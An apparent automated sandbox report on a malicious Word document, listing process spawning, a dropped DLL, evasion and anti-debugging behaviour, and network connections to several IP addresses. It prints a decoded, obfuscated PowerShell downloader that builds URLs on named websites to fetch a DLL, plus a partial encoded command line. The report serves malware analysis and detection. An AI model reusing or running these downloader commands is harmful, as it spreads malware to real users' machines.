Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00253848 push 00253874h; ret	7_2_0025386C

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Kizmwn\teeko.fjq

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Kizmwn\teeko.fjq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2352

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2094600564.00000000007CD000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001F1D4D mov eax, dword ptr fs:[00000030h]	7_2_001F1D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002912C1 mov eax, dword ptr fs:[00000030h]	7_2_002912C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00411D4D mov eax, dword ptr fs:[00000030h]	8_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_007112C1 mov eax, dword ptr fs:[00000030h]	8_2_007112C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001812C1 mov eax, dword ptr fs:[00000030h]	9_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A12C1 mov eax, dword ptr fs:[00000030h]	10_2_003A12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D12C1 mov eax, dword ptr fs:[00000030h]	11_2_003D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_001F12C1 mov eax, dword ptr fs:[00000030h]	12_2_001F12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_00661D4D mov eax, dword ptr fs:[00000030h]	13_2_00661D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001B12C1 mov eax, dword ptr fs:[00000030h]	13_2_001B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00411D4D mov eax, dword ptr fs:[00000030h]	14_2_00411D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D12C1 mov eax, dword ptr fs:[00000030h]	14_2_001D12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00171D4D mov eax, dword ptr fs:[00000030h]	15_2_00171D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_002B12C1 mov eax, dword ptr fs:[00000030h]	15_2_002B12C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00281D4D mov eax, dword ptr fs:[00000030h]	16_2_00281D4D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_001A12C1 mov eax, dword ptr fs:[00000030h]	16_2_001A12C1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 217.160.169.110 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 51.255.203.164 144	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.183.16.47 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 84.232.229.24 80	Jump to behavior

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcA